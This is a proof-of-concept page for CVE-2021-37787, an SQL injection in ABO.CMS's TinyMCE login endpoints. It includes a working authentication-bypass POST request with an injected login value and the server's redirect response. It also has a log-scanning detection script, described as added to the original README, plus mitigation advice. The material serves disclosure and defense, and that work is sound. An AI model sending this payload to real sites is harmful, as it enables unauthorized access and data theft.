CVE-2021-37787 PoC — ABO.CMS Security Vulnerability

Source
Associated Vulnerability
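Title: ABO.CMS Security Vulnerability (CVE-2021-37787)
Description: ABO.CMS is a content management platform from the company ABO.CMS. ABO.CMS versions 5.8 through 5.9.3 contain a security vulnerability that stems from SQL injection via HTTP POST requests sent to the TinyMCE module.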
Description
CVE-2021-37787
Readme
# CVE-2021-37787: SQL Injection in ABOCMS via TinyMCE Module



## Vulnerability Details



- **CVE ID**: CVE-2021-37787

- **Product**: ABOCMS

- **Affected Version(s)**: 5.8.x, ≤ 5.9.3

- **Vulnerability Type**: SQL Injection

- **CVSS Score**: 9.8



### Description



A critical SQL injection vulnerability exists in ABOCMS within the TinyMCE module. The vulnerability arises due to insufficient input sanitization in the TinyMCE module's interaction with the database, allowing an attacker to inject malicious SQL queries. This can lead to unauthorized data access, modification, or even full compromise of the underlying database.



The vulnerable endpoint is located in the TinyMCE module's processing of user-supplied input. An attacker can exploit this flaw to execute arbitrary SQL commands.



### Impact



- Authentication bypass.

- Extraction of sensitive data.

- Modification or deletion of database records.

- Potential remote code execution, depending on the database configuration.



## Proof of Concept (PoC)



## POST Request



```
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded

return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login
```



## Response



```
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html
```



### Vulnerable Endpoint



The vulnerability can be triggered via either of the following endpoints:

- `/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php`

- `/js/admin/tiny_mce/plugins/filemanager/login_session_auth.php`
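
A defender-side check for the requests described above, as an added example that is not part of the original README: it scans logged HTTP records for POSTs to the two endpoints whose `login` field carries quotes or SQL comment markers. It assumes request bodies are available (for example from a WAF or reverse-proxy audit log); the record tuple layout and the function names are hypothetical.

```python
from urllib.parse import parse_qs, urlsplit

# The two login endpoints named in the advisory.
IM_PATH = "/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php"
FM_PATH = "/js/admin/tiny_mce/plugins/filemanager/login_session_auth.php"
AUTH_ENDPOINTS = {IM_PATH, FM_PATH}

# Quotes and SQL comment/statement markers. Assumption: real login names never
# contain these. Passwords legitimately can, so only `login` is inspected.
SQL_TOKENS = ("'", '"', "#", "--", "/*", ";")


def inspect_request(method, target, body, status):
    """Return a finding for a suspicious login POST, or None."""
    path = urlsplit(target).path
    if method.upper() != "POST" or path not in AUTH_ENDPOINTS:
        return None
    # parse_qs URL-decodes, so %27 and %23 are matched as ' and #.
    form = parse_qs(body, keep_blank_values=True)
    tokens = [t for t in SQL_TOKENS
              if any(t in value for value in form.get("login", []))]
    if not tokens:
        return None
    # The advisory's response is a 302 to return_url. Treating any 302 as a
    # granted session is an assumption; compare against a failed login.
    return {"path": path, "tokens": tokens, "redirected": status == 302}


def scan(records):
    """Run inspect_request over (method, target, body, status) tuples."""
    return [f for f in (inspect_request(*r) for r in records) if f]


# Constructed sample records. The first body is the request shown above.
SAMPLE_RECORDS = [
    ("POST", IM_PATH,
     "return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager"
     "%2Findex.php%3Ftype%3Dim%26page%3Dindex.html"
     "&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login", 302),
    ("POST", FM_PATH, "login=editor&password=S3cret%23x&submit_button=Login", 302),
    ("GET", IM_PATH, "", 200),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

A finding with `redirected` set is the case to triage first, since it pairs the injected login value with the redirect seen in the response above.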



## Mitigation



- **For Users**:

  - Upgrade to the latest version of ABOCMS.

  - Disable the TinyMCE module if it's not essential.



- **For Developers**:

  - Use prepared statements or parameterized queries to interact with the database.

  - Update the TinyMCE module to the latest secure version.

  - Implement proper input validation to filter out malicious payloads.



## Disclaimer



This PoC is provided for educational and security research purposes only. Do not use this code to harm systems or networks without explicit permission from the owner. The author is not responsible for any misuse or damage caused by this PoC.